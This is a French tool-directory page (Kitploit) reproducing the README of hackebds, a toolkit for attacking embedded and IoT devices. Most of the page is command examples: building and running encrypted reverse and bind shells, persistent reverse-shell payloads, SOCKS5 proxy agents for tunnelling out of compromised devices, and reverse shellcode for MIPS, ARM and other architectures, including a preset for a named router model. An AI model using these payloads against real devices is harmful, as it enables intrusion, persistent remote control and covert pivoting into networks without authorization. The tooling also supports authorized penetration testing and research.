Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
hackEmbedded — Cet outil est utilisé pour le chiffrement de backdoor, la génération de shellcode et de proxy socks5, la récupération d'informations et l'organisation de POC pour divers dispositifs architecturaux. | Kitploit
Outils/GitHubGitHub/doudoudedi/hackembedded
Sécurité des Systèmes EmbarquésOutils de Chiffrement/DéchiffrementSécurité IoTGénération de PayloadsExploitationRétro-ingénierieShellcodeTests d'IntrusionCommandement et ContrôleOutil d'Accès à DistanceAnalyse de Micrologiciel
20732il y a 25 joursVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
doudoudedi/hackembedded

hackEmbedded

Cet outil est utilisé pour le chiffrement de backdoor, la génération de shellcode et de proxy socks5, la récupération d'informations et l'organisation de POC pour divers dispositifs architecturaux.

Voir le dépôt
Partager

hackebds

PyPI - WheelPyPI - Python Version Downloads PyPI - Downloads

🔗中文 readme

Aperçu

hackebds est une boîte à outils pour la génération de payloads pour dispositifs embarqués, les workflows de shell chiffré, le tunneling proxy SOCKS5 et la recherche d'informations sur les dispositifs.

La branche actuelle utilise un workflow ELF pur pour les fonctionnalités de shell chiffré et de proxy :

  • reverse_shell_file + encrypted_shell_server / reverse_shell_server
  • bind_shell + bind_shell_client
  • reverse_proxy_file + reverse_proxy_server
  • forward_proxy_file

Quoi de neuf dans la nouvelle version

  • Ajout du reverse shell chiffré et du bind shell chiffré pour les architectures supportées dans l'arborescence actuelle
  • Ajout du listener ELF encrypted_shell_server / reverse_shell_server pour recevoir les reverse shells chiffrés sans avoir besoin d'un interpréteur Python
  • Ajout du connecteur ELF bind_shell_client pour bind_shell
  • Ajout des workflows ELF pour le proxy SOCKS5 inversé et le proxy SOCKS5 direct
  • Ajout des choix de chiffrement aes et chacha20 pour le trafic shell / proxy chiffré
  • Ajout de -bind_ip pour les binaires ELF côté listener tels que bind_shell, encrypted_shell_server, reverse_proxy_server et forward_proxy_file
  • Conservation de reverse_shell_file et comme sortants : ils utilisent et ne lient pas d'adresse IP de locale

Installation

root@kitploit:~
python3 -m pip install -U hackebds

Installation en mode développement local :

root@kitploit:~
git clone https://github.com/doudoudedi/hackEmbedded
cd hackEmbedded
python3 -m pip install -e .

Construction sur une autre machine

Si vous reconstruisez les wheels de version sur un autre hôte, utilisez l'archive source et build_release.py.

root@kitploit:~
unzip hackebds-0.4.3-source-for-x86-build.zip
cd hackebds-0.4.0.backup-20260411T142751Z
python3 -m pip install -U pip setuptools wheel cython
python3 build_release.py --plat manylinux2014_x86_64

Binutils requis

Installez les binutils pour l'architecture cible avant de générer des fichiers ELF non natifs.

root@kitploit:~
sudo apt install binutils-aarch64-linux-gnu
sudo apt install binutils-arm-linux-gnueabi
sudo apt install binutils-mips-linux-gnu
sudo apt install binutils-mipsel-linux-gnu
sudo apt install binutils-mips64-linux-gnuabi64
sudo apt install binutils-mips64el-linux-gnuabi64
sudo apt install binutils-powerpc-linux-gnu
sudo apt install binutils-riscv64-linux-gnu

Les utilisateurs macOS peuvent utiliser les binutils de pwntools :

root@kitploit:~
brew install https://raw.githubusercontent.com/Gallopsled/pwntools-binutils/master/osx/binutils-$ARCH.rb

Exemples d'utilisation

1. Reverse shell chiffré

Côté attaquant :

root@kitploit:~
hackebds -arch x64 -res encrypted_shell_server \
  -reverse_port 4444 \
  -bind_ip 192.168.56.1 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename reverse_server.elf

chmod +x reverse_server.elf
./reverse_server.elf

Cible :

root@kitploit:~
hackebds -arch mipsel -res reverse_shell_file \
  -reverse_ip 192.168.56.1 -reverse_port 4444 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename reverse_payload.elf

chmod +x reverse_payload.elf
./reverse_payload.elf

Remarques :

  • reverse_shell_file ne supporte pas -bind_ip
  • encrypted_shell_server supporte -bind_ip
  • Remplacez -cipher chacha20 par -cipher aes pour utiliser AES

2. Bind shell chiffré

Cible :

root@kitploit:~
hackebds -arch aarch64 -res bind_shell \
  -bind_port 5555 \
  -bind_ip 192.168.56.20 \
  -passwd "s3cr3t" \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename bind_shell.elf

chmod +x bind_shell.elf
./bind_shell.elf

Côté attaquant :

root@kitploit:~
hackebds -arch x64 -res bind_shell_client \
  -reverse_ip 192.168.56.20 -reverse_port 5555 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename bind_client.elf

chmod +x bind_client.elf
./bind_client.elf

Ensuite, saisissez :

root@kitploit:~
s3cr3t
id
uname -a
exit

3. Reverse shell persistant

Listener :

root@kitploit:~
hackebds -arch x64 -res encrypted_shell_server --power \
  -reverse_port 4444 \
  -bind_ip 192.168.56.1 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename power_server.elf

./power_server.elf

Payload :

root@kitploit:~
hackebds -arch armelv7 -res reverse_shell_file --power -sleep 10 \
  -reverse_ip 192.168.56.1 -reverse_port 4444 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename power_payload.elf

4. Proxy SOCKS5 inversé chiffré

Serveur :

root@kitploit:~
hackebds -arch x64 -res reverse_proxy_server \
  -agent_port 7000 -socks_port 1080 \
  -bind_ip 192.168.56.1 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename reverse_proxy_server.elf

chmod +x reverse_proxy_server.elf
./reverse_proxy_server.elf

Agent :

root@kitploit:~
hackebds -arch mips64el -res reverse_proxy_file \
  -reverse_ip 192.168.56.1 -reverse_port 7000 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename reverse_proxy_agent.elf

chmod +x reverse_proxy_agent.elf
./reverse_proxy_agent.elf

Test :

root@kitploit:~
curl --socks5-hostname 127.0.0.1:1080 http://example.com/

Serveur avec authentification :

root@kitploit:~
hackebds -arch x64 -res reverse_proxy_server \
  -agent_port 7000 -socks_port 1080 \
  -bind_ip 192.168.56.1 \
  -socks_auth user:pass \
  -cipher aes -encrypt_key "demo-key" \
  -filename reverse_proxy_server_auth.elf

Note UDP :

  • Le proxy SOCKS5 inversé dispose d'une prise en charge UDP sur les chemins proxy non SPARC implémentés
  • sparc / sparc64 ne doivent pas être considérés comme supportant UDP

5. Proxy SOCKS5 direct

root@kitploit:~
hackebds -arch x64 -res forward_proxy_file \
  -listen_port 1081 \
  -bind_ip 192.168.56.1 \
  -filename forward_proxy.elf

chmod +x forward_proxy.elf
./forward_proxy.elf

Test :

root@kitploit:~
curl --socks5-hostname 127.0.0.1:1081 http://example.com/

6. Reverse shellcode

root@kitploit:~
hackebds -arch armelv7 -res reverse_shellcode \
  -reverse_ip 192.168.56.1 -reverse_port 4444

7. Utilisation de -model

root@kitploit:~
hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 \
  -model DIR-816 -res reverse_shell_file

8. Utilisation de --mcpu

root@kitploit:~
hackebds -mcpu mips32r2 -li -arch mipsel \
  -reverse_ip 127.0.0.1 -reverse_port 9999 \
  -res reverse_shell_file

9. Utilisation de --firmware

root@kitploit:~
hackebds --firmware ./firmware.bin

Remarques

  • -bind_ip est réservé aux fichiers ELF côté listener
  • reverse_shell_file et reverse_proxy_file sont des payloads sortants et ne lient pas d'adresse IP de listener locale
  • reverse_proxy_server et forward_proxy_file supportent -bind_ip
  • Les exemples de shell/proxy chiffrés fonctionnent avec chacha20 et aes, à condition que les deux côtés soient d'accord
Télécharger l’outil
reverse_proxy_file
payloads
-reverse_ip
listener